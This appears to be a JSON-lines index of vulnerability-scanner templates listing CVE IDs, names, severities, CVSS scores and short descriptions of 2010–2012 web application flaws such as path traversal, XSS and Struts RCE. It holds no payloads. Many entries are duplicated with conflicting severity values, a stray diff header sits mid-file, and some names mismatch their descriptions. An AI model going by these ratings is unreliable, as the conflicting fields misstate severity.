{"ID":"CVE-2010-2680","Info":{"Name":"Joomla! Component jesectionfinder - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2680.yaml"}
{"ID":"CVE-2010-2307","Info":{"Name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","Severity":"medium","Description":"Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) \"//\" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-2307.yaml"}
{"ID":"CVE-2010-2507","Info":{"Name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2507.yaml"}
{"ID":"CVE-2010-2680","Info":{"Name":"Joomla! Component jesectionfinder - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2680.yaml"}
{"ID":"CVE-2010-2682","Info":{"Name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2682.yaml"}
{"ID":"CVE-2010-2857","Info":{"Name":"Joomla! Component Music Manager - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2857.yaml"}
{"ID":"CVE-2010-2857","Info":{"Name":"Joomla! Component Music Manager - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2857.yaml"}
{"ID":"CVE-2010-2861","Info":{"Name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2861.yaml"}
{"ID":"CVE-2010-2918","Info":{"Name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","Severity":"high","Description":"A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2918.yaml"}
{"ID":"CVE-2010-2920","Info":{"Name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2920.yaml"}
{"ID":"CVE-2010-3203","Info":{"Name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2010/CVE-2010-3203.yaml"}
{"ID":"CVE-2010-2920","Info":{"Name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2920.yaml"}
{"ID":"CVE-2010-3203","Info":{"Name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","Severity":"medium","Description":"A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-3203.yaml"}
{"ID":"CVE-2010-3426","Info":{"Name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-3426.yaml"}
{"ID":"CVE-2010-4231","Info":{"Name":"Camtron CMNC-200 IP Camera - Directory Traversal","Severity":"high","Description":"The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2010/CVE-2010-4231.yaml"}
{"ID":"CVE-2010-4239","Info":{"Name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","Severity":"critical","Description":"Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2010/CVE-2010-4239.yaml"}
{"ID":"CVE-2010-4282","Info":{"Name":"phpShowtime 2.0 - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-4282.yaml"}
{"ID":"CVE-2010-4617","Info":{"Name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-4617.yaml"}
{"ID":"CVE-2010-4617","Info":{"Name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-4617.yaml"}
{"ID":"CVE-2010-4719","Info":{"Name":"Joomla! Component JRadio - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-4719.yaml"}
{"ID":"CVE-2010-4769","Info":{"Name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-4769.yaml"}
{"ID":"CVE-2010-4977","Info":{"Name":"Joomla! Component Canteen 1.0 - Local File Inclusion","Severity":"high","Description":"A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-4977.yaml"}
{"ID":"CVE-2010-5028","Info":{"Name":"Joomla! Component JE Job 1.0 - Local File Inclusion","Severity":"high","Description":"A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-5028.yaml"}
{"ID":"CVE-2010-5278","Info":{"Name":"MODx manager - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-5278.yaml"}
{"ID":"CVE-2010-5286","Info":{"Name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-5286.yaml"}
{"ID":"CVE-2011-0049","Info":{"Name":"Majordomo2 - SMTP/HTTP Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-0049.yaml"}
{"ID":"CVE-2011-1669","Info":{"Name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","Severity":"high","Description":"A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-1669.yaml"}
{"ID":"CVE-2011-2744","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2011/CVE-2011-2744.yaml"}
{"ID":"CVE-2011-2780","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2011/CVE-2011-2780.yaml"}
{"ID":"CVE-2010-5278","Info":{"Name":"MODx manager - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-5278.yaml"}
{"ID":"CVE-2010-5286","Info":{"Name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","Severity":"critical","Description":"A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2010/CVE-2010-5286.yaml"}
{"ID":"CVE-2011-0049","Info":{"Name":"Majordomo2 - SMTP/HTTP Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-0049.yaml"}
{"ID":"CVE-2011-1669","Info":{"Name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","Severity":"medium","Description":"A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-1669.yaml"}
{"ID":"CVE-2011-2744","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2011/CVE-2011-2744.yaml"}
{"ID":"CVE-2011-2780","Info":{"Name":"Chyrp 2.x - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-2780.yaml"}
{"ID":"CVE-2011-3315","Info":{"Name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2011/CVE-2011-3315.yaml"}
{"ID":"CVE-2011-4336","Info":{"Name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","Severity":"medium","Description":"Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET \"ajax\" parameter to snarf_ajax.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2011/CVE-2011-4336.yaml"}
{"ID":"CVE-2011-4618","Info":{"Name":"Advanced Text Widget \u003c 2.0.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4618.yaml"}
{"ID":"CVE-2011-4624","Info":{"Name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4624.yaml"}
{"ID":"CVE-2011-4804","Info":{"Name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-4804.yaml"}
{"ID":"CVE-2011-4804","Info":{"Name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-4804.yaml"}
{"ID":"CVE-2011-4926","Info":{"Name":"Adminimize 1.7.22 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4926.yaml"}
{"ID":"CVE-2011-5106","Info":{"Name":"WordPress Plugin Flexible Custom Post Type \u003c 0.1.7 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5106.yaml"}
{"ID":"CVE-2011-5107","Info":{"Name":"Alert Before Your Post \u003c= 0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5107.yaml"}
@ -172,32 +172,32 @@
{"ID":"CVE-2011-5181","Info":{"Name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5181.yaml"}
{"ID":"CVE-2011-5252","Info":{"Name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2011/CVE-2011-5252.yaml"}
{"ID":"CVE-2011-5265","Info":{"Name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5265.yaml"}
{"ID":"CVE-2012-0392","Info":{"Name":"Apache Struts2 S2-008 RCE","Severity":"critical","Description":"The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2012/CVE-2012-0392.yaml"}
{"ID":"CVE-2012-0394","Info":{"Name":"Apache Struts \u003c2.3.1.1 - Remote Code Execution","Severity":"critical","Description":"Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2012/CVE-2012-0394.yaml"}
{"ID":"CVE-2012-0896","Info":{"Name":"Count Per Day \u003c= 3.1 - download.php f Parameter Traversal Arbitrary File Access","Severity":"high","Description":"An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0896.yaml"}
{"ID":"CVE-2012-0392","Info":{"Name":"Apache Struts2 S2-008 RCE","Severity":"medium","Description":"The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2012/CVE-2012-0392.yaml"}
{"ID":"CVE-2012-0394","Info":{"Name":"Apache Struts \u003c2.3.1.1 - Remote Code Execution","Severity":"medium","Description":"Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2012/CVE-2012-0394.yaml"}
{"ID":"CVE-2012-0896","Info":{"Name":"Count Per Day \u003c= 3.1 - download.php f Parameter Traversal Arbitrary File Access","Severity":"medium","Description":"An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0896.yaml"}
{"ID":"CVE-2012-0901","Info":{"Name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-0901.yaml"}
{"ID":"CVE-2012-0981","Info":{"Name":"phpShowtime 2.0 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0981.yaml"}
{"ID":"CVE-2012-0991","Info":{"Name":"OpenEMR 4.1 - Local File Inclusion","Severity":"high","Description":"Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2012/CVE-2012-0991.yaml"}
{"ID":"CVE-2012-0996","Info":{"Name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","Severity":"high","Description":"Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2012/CVE-2012-0996.yaml"}
{"ID":"CVE-2012-0981","Info":{"Name":"phpShowtime 2.0 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0981.yaml"}
{"ID":"CVE-2012-0991","Info":{"Name":"OpenEMR 4.1 - Local File Inclusion","Severity":"low","Description":"Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.","Classification":{"CVSSScore":"3.5"}},"file_path":"http/cves/2012/CVE-2012-0991.yaml"}
{"ID":"CVE-2012-0996","Info":{"Name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","Severity":"medium","Description":"Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-0996.yaml"}
{"ID":"CVE-2012-1226","Info":{"Name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","Severity":"high","Description":"Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2012/CVE-2012-1226.yaml"}
{"ID":"CVE-2012-1823","Info":{"Name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","Severity":"critical","Description":"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2012/CVE-2012-1823.yaml"}
{"ID":"CVE-2012-1823","Info":{"Name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","Severity":"high","Description":"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2012/CVE-2012-1823.yaml"}
{"ID":"CVE-2012-1835","Info":{"Name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-1835.yaml"}
{"ID":"CVE-2012-2371","Info":{"Name":"WP-FaceThumb 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-2371.yaml"}
{"ID":"CVE-2012-3153","Info":{"Name":"Oracle Forms \u0026 Reports RCE (CVE-2012-3152 \u0026 CVE-2012-3153)","Severity":"critical","Description":"An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,\n11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown\nvectors related to Report Server Component.\n","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-3153.yaml"}
{"ID":"CVE-2012-3153","Info":{"Name":"Oracle Forms \u0026 Reports RCE (CVE-2012-3152 \u0026 CVE-2012-3153)","Severity":"medium","Description":"An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,\n11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown\nvectors related to Report Server Component.\n","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-3153.yaml"}
{"ID":"CVE-2012-4242","Info":{"Name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4242.yaml"}
{"ID":"CVE-2012-4253","Info":{"Name":"MySQLDumper 1.24.4 - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4253.yaml"}
{"ID":"CVE-2012-4253","Info":{"Name":"MySQLDumper 1.24.4 - Directory Traversal","Severity":"medium","Description":"Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4253.yaml"}
